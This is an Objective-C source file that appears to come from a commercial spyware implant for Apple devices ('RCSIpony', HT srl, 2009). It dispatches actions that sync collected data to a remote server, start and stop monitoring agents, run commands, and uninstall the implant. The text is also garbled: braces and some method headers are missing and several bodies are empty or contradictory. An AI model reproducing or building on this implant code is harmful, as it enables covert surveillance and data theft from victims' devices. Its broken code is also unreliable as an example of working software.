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Test Coverage
 * RCSIpony - Actions
 *  Provides all the actions which should be triggered upon an Event
 * Created by Alfredo 'revenge' Pesoli on 11/06/2009
 * Copyright (C) HT srl 2009. All rights reserved
#import <mach/message.h>

#import "RCSIActions.h"
#import "RCSITaskManager.h"
#import "RESTNetworkProtocol.h"
#import "RCSICommon.h"
#import "RCSIInfoManager.h"
#import <mach/mach.h>

//#define DEBUG_

static RCSIActions  *sharedActionManager  = nil;

@implementation RCSIActions

@synthesize notificationPort;

#pragma mark -
#pragma mark Class and init methods
#pragma mark -

+ (RCSIActions *)sharedInstance
  if (sharedActionManager == nil)
      [[self alloc] init];
  return sharedActionManager;

+ (id)allocWithZone: (NSZone *)aZone
  if (sharedActionManager == nil)
      sharedActionManager = [super allocWithZone: aZone];
      return sharedActionManager;
  // On subsequent allocation attemps return nil
  return nil;

- (id)copyWithZone: (NSZone *)aZone
  return self;

- (id)init
  Class myClass = [self class];
    if (sharedActionManager != nil)
      self = [super init];
      if (self != nil)
          // allocated here and never released: al max count == 0
          mActionsMessageQueue = [[NSMutableArray alloc] initWithCapacity:0];
          notificationPort = nil;
  return sharedActionManager;

- (id)retain
  return self;

- (unsigned)retainCount
  // Denotes an object that cannot be released
  return UINT_MAX;

- (void)release
  // Do nothing

- (id)autorelease
  return self;

#pragma mark -
#pragma mark Action Dispatcher
#pragma mark -

- (void)synched
    if (isSynching == TRUE)
      isSynching = FALSE;

- (BOOL)synching
  BOOL success = FALSE;
    if (isSynching == FALSE)
        isSynching = TRUE;
        success = TRUE;
  return success;

- (BOOL)tryTriggerAction:(int)anActionID
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  BOOL concurrent = FALSE;
  RCSITaskManager *taskManager = [RCSITaskManager sharedInstance];
  NSArray *configArray = [taskManager getConfigForAction: anActionID withFlag: &concurrent];
  if (configArray == nil)
    return FALSE;
      if (concurrent == FALSE)
        [self triggerAction: configArray];
          [NSThread detachNewThreadSelector: @selector(triggerAction:) toTarget:self withObject:configArray];
  [pool release];
  return TRUE;

- (BOOL)triggerAction: (NSArray*)configArray
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  NSMutableDictionary *configuration;

  for (configuration in configArray)
      int32_t type = [[configuration objectForKey: @"type"] intValue];
      switch (type)
          case ACTION_SYNC:
            if ([[configuration objectForKey: @"status"] intValue] == 0)
              if (gAgentCrisis == NO && [self synching] == TRUE) 
                  NSNumber *status = [NSNumber numberWithInt: 1];
                  [configuration setObject: status forKey: @"status"];
                  NSNumber *stop = [configuration objectForKey: @"stop"];
                  BOOL aRetVal = [self actionSync: configuration];
                  // synching done... reset flag
                  [self synched];
                  if (aRetVal == TRUE && stop != nil && [stop boolValue] == TRUE)
                      [configArray release];
                      [pool release];
                      return TRUE;
          case ACTION_AGENT_START:
            if ([[configuration objectForKey: @"status"] intValue] == 0)
                NSNumber *status = [NSNumber numberWithInt: 1];
                [configuration setObject: status forKey: @"status"];

                [self actionAgent: configuration start: TRUE];
          case ACTION_AGENT_STOP:
            if ([[configuration objectForKey: @"status"] intValue] == 0)
                NSNumber *status = [NSNumber numberWithInt: 1];
                [configuration setObject: status forKey: @"status"];
                [self actionAgent: configuration start: FALSE];
          case ACTION_UNINSTALL:
            if ([[configuration objectForKey: @"status"] intValue] == 0)
                NSNumber *status = [NSNumber numberWithInt: 1];
                [configuration setObject: status forKey: @"status"];

                [self actionUninstall: configuration];
          case ACTION_INFO:
            if ([[configuration objectForKey: @"status"] intValue] == 0)
                NSNumber *status = [NSNumber numberWithInt: 1];
                [configuration setObject: status forKey: @"status"];
                [self actionInfo: configuration];
                status = [NSNumber numberWithInt: 0];
                [configuration setObject: status forKey: @"status"];
          case ACTION_COMMAND:
          if ([[configuration objectForKey: @"status"] intValue] == 0)
              NSNumber *status = [NSNumber numberWithInt: 1];
              [configuration setObject: status forKey: @"status"];
              [self actionLaunchCommand: configuration];
              status = [NSNumber numberWithInt: 0];
              [configuration setObject: status forKey: @"status"];
          case ACTION_EVENT:
            if ([[configuration objectForKey: @"status"] intValue] == 0)
                NSNumber *status = [NSNumber numberWithInt: 1];
                [configuration setObject: status forKey: @"status"];
                [self actionEvent: configuration];
                status = [NSNumber numberWithInt: 0];
                [configuration setObject: status forKey: @"status"];
  // retain by getConfigForAction
  [configArray release];
  [pool release];
  return TRUE;


#pragma mark -
#pragma mark Actions
#pragma mark -


- (BOOL)actionSync: (NSMutableDictionary *)aConfiguration
  NSAutoreleasePool *outerPool = [[NSAutoreleasePool alloc] init];
  BOOL aRetVal = TRUE;
  [aConfiguration retain];

  NSData *syncConfig = [aConfiguration objectForKey: @"data"];
  // play sound in demo mode
  RESTNetworkProtocol *protocol = [[RESTNetworkProtocol alloc]
                                   initWithConfiguration: syncConfig
                                                 andType: ACTION_SYNC];

  if ([protocol perform] == NO)
      aRetVal = FALSE;
  NSNumber *status = [NSNumber numberWithInt: 0];
  [aConfiguration setObject: status forKey: @"status"];

  [protocol release];  
  [aConfiguration release];
  [outerPool release];
  return aRetVal;

#if 0
- (BOOL)actionSyncAPN: (NSMutableDictionary *)aConfiguration
  NSAutoreleasePool *outerPool = [[NSAutoreleasePool alloc] init];
  [aConfiguration retain];

  NSData *syncConfig = [[aConfiguration objectForKey: @"data"] retain];
  RESTNetworkProtocol *protocol = [[RESTNetworkProtocol alloc]
                                   initWithConfiguration: syncConfig
                                                 andType: ACTION_SYNC_APN];

  if ([protocol perform] == NO)
      errorLog(@"An error occurred while syncing over APN with REST proto");
      BOOL bSuccess = NO;
      RCSITaskManager *taskManager = [RCSITaskManager sharedInstance];
      NSMutableDictionary *agentConfiguration = [taskManager getConfigForAgent: AGENT_DEVICE];
      deviceStruct *tmpDevice = 
      (deviceStruct*)[[agentConfiguration objectForKey: @"data"] bytes];
      if (tmpDevice != nil &&
          tmpDevice->isEnabled == AGENT_DEV_ENABLED)
          bSuccess = [taskManager startAgent: AGENT_DEVICE];
#ifdef DEBUG
          NSLog(@"%s: sync performed... restarting DEVICE Agent %d", __FUNCTION__, bSuccess);
#ifdef DEBUG
          NSLog(@"%s: sync performed... DEVICE Agent dont restarted", __FUNCTION__);
  NSNumber *status = [NSNumber numberWithInt: 0];
  [aConfiguration setObject: status forKey: @"status"];

  [protocol release];  
  [aConfiguration release];
  [outerPool release];
  return YES;

- (BOOL)actionAgent: (NSMutableDictionary *)aConfiguration start: (BOOL)aFlag
  RCSITaskManager *taskManager = [RCSITaskManager sharedInstance];

  [aConfiguration retain];
  // Start/Stop Agent actions got the agentID inside the additional Data
  u_int agentID = 0;
  [[aConfiguration objectForKey: @"data"] getBytes: &agentID];
  if (aFlag == TRUE)
#ifdef DEBUG
      NSLog(@"%s: start agent %#x", __FUNCTION__, agentID);
      [taskManager startAgent: agentID];
#ifdef DEBUG
      NSLog(@"%s: stop agent %#x", __FUNCTION__, agentID);
     [taskManager stopAgent: agentID];
  NSNumber *status = [NSNumber numberWithInt: 0];
  [aConfiguration setObject: status forKey: @"status"];
  return TRUE;

- (BOOL)actionLaunchCommand: (NSMutableDictionary *)aConfiguration
  NSData *conf = [aConfiguration objectForKey: @"data"];
  NSString *cmdStr = [[NSString alloc] initWithBytes: [conf bytes] length: [conf length] encoding:NSUTF8StringEncoding];
  char *commandBuff = (char*)[cmdStr cStringUsingEncoding: NSUTF8StringEncoding];
  if (commandBuff != NULL)
  [cmdStr release];
  NSNumber *status = [NSNumber numberWithInt: 0];
  [aConfiguration setObject: status forKey: @"status"];
  return TRUE;

- (BOOL)actionUninstall: (NSMutableDictionary *)aConfiguration
  RCSITaskManager *taskManager = [RCSITaskManager sharedInstance];
  [aConfiguration retain];
#ifdef DEBUG
  NSLog(@"Action Uninstall started!");
  [taskManager uninstallMeh];
  NSNumber *status = [NSNumber numberWithInt: 0];
  [aConfiguration setObject: status forKey: @"status"];
  return TRUE;

- (BOOL)actionInfo: (NSMutableDictionary *)aConfiguration
  RCSIInfoManager *infoManager = [[RCSIInfoManager alloc] init];
  [aConfiguration retain];

  NSData *conf = [aConfiguration objectForKey: @"data"];
#ifdef DEBUG
  NSLog(@"Action Info started: %@", [aConfiguration objectForKey: @"data"]);

  int32_t len = 0;
  NSData *stringData;
  [conf getBytes: &len
          length: sizeof(int32_t)];
      stringData = [conf subdataWithRange: NSMakeRange(sizeof(int32_t), len)];
  @catch (NSException *e)
#ifdef DEBUG
      NSLog(@"exception on makerange (%@)", [e reason]);

      [aConfiguration release];
      return NO;
  NSString *text = [[NSString alloc] initWithData: stringData
                                         encoding: NSUTF16LittleEndianStringEncoding];
  [infoManager logActionWithDescription: text];
  [text release];
  [aConfiguration release];
  [infoManager release];

  return TRUE;

typedef struct {
  UInt32 enabled;
  UInt32 event;
} action_event_t;

- (BOOL)actionEvent: (NSMutableDictionary *)aConfiguration
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  NSNumber *newStatus;
  action_event_t *event;
  [aConfiguration retain];
  event = (action_event_t*)[[aConfiguration objectForKey: @"data"] bytes];
  if (event != nil)
      if (event->enabled == TRUE) 
        newStatus = [NSNumber numberWithInt: 1];
        newStatus = [NSNumber numberWithInt: 0];
      NSMutableDictionary *anEvent = 
      [[[RCSITaskManager sharedInstance] mEventsList] objectAtIndex: event->event];
      id anObject = [anEvent objectForKey: @"object"];
      if (anObject != nil)
            if ([anObject respondsToSelector: @selector(setEnabled:)] == YES)
              [anObject performSelector:@selector(setEnabled:) withObject:newStatus];
  [aConfiguration release];
  [pool release];
  return TRUE;


#pragma mark -
#pragma mark Main runloop
#pragma mark -


typedef struct _coreMessage_t
  mach_msg_header_t header;
  uint dataLen;
} coreMessage_t;

- (BOOL)addMessage: (NSData*)aMessage
  // messages removed by handleMachMessage
    [mActionsMessageQueue addObject: aMessage];
  return TRUE;

// handle the incomings events
- (void) handleMachMessage:(void *) msg 
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  coreMessage_t *coreMsg = (coreMessage_t*)msg;
  NSData *theData = [NSData dataWithBytes: ((u_char*)msg + sizeof(coreMessage_t))  
                                   length: coreMsg->dataLen];
  [self addMessage: theData];
  [pool release];

- (BOOL)processAction:(NSData *)aData
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  int actionID = 0xFFFFFFFF;
  if (aData == nil)
    return FALSE;
  memcpy(&actionID, [aData bytes], sizeof(int));
  [self tryTriggerAction: actionID];
  [pool release];
  return TRUE;

// Process new incoming events
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  NSMutableArray *tmpMessages;
    tmpMessages = [[mActionsMessageQueue copy] autorelease];
    [mActionsMessageQueue removeAllObjects];
#ifdef DEBUG
  NSLog(@"%s: process messages %d", __FUNCTION__, [tmpMessages count]);
  int logCount = [tmpMessages count];
  for (int i=0; i < logCount; i++)
      [self processAction: [tmpMessages objectAtIndex:i]];
  [pool release];
  return logCount;

NSString *kRunLoopActionManagerMode = @"kRunLoopActionManagerMode";

- (void)actionManagerRunLoop
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];

  while (actionManagerStatus == ACTION_MANAGER_RUNNING &&
         actionManagerStatus == ACTION_MANAGER_STOPPING)
#ifdef DEBUG
      NSLog(@"%s: actionManagerRunLoop found alredy running", __FUNCTION__);
  actionManagerStatus = ACTION_MANAGER_RUNNING;

  NSRunLoop *actionManagerRunLoop = [NSRunLoop currentRunLoop];
  notificationPort = [[NSMachPort alloc] init];
  [notificationPort setDelegate: self];
  [actionManagerRunLoop addPort: notificationPort 
                        forMode: kRunLoopActionManagerMode];
  // run the log loop: event send notification to this
  while (actionManagerStatus == ACTION_MANAGER_RUNNING)
      NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
      [actionManagerRunLoop runMode: kRunLoopActionManagerMode 
                         beforeDate: [NSDate dateWithTimeIntervalSinceNow:0.750]];
      // process incoming logs out of the runloop
      [self processIncomingActions];   
      [pool release];
  // remove source port, release machport, remove action queue
  [actionManagerRunLoop removePort: notificationPort 
                           forMode: kRunLoopActionManagerMode];
  [notificationPort release];
  notificationPort = nil;
    [mActionsMessageQueue removeAllObjects];
  // work is done: stop the manager
  actionManagerStatus = ACTION_MANAGER_STOPPED;
  [pool release];

- (void)start
  [NSThread detachNewThreadSelector: @selector(actionManagerRunLoop) 
                           toTarget: self withObject:nil];

// Excecuted by another thread
- (BOOL)stop
  actionManagerStatus = ACTION_MANAGER_STOPPING;
  for (int i=0; i<5; i++) 
    if (actionManagerStatus == ACTION_MANAGER_STOPPED)

  return actionManagerStatus == ACTION_MANAGER_STOPPED ? TRUE : FALSE;

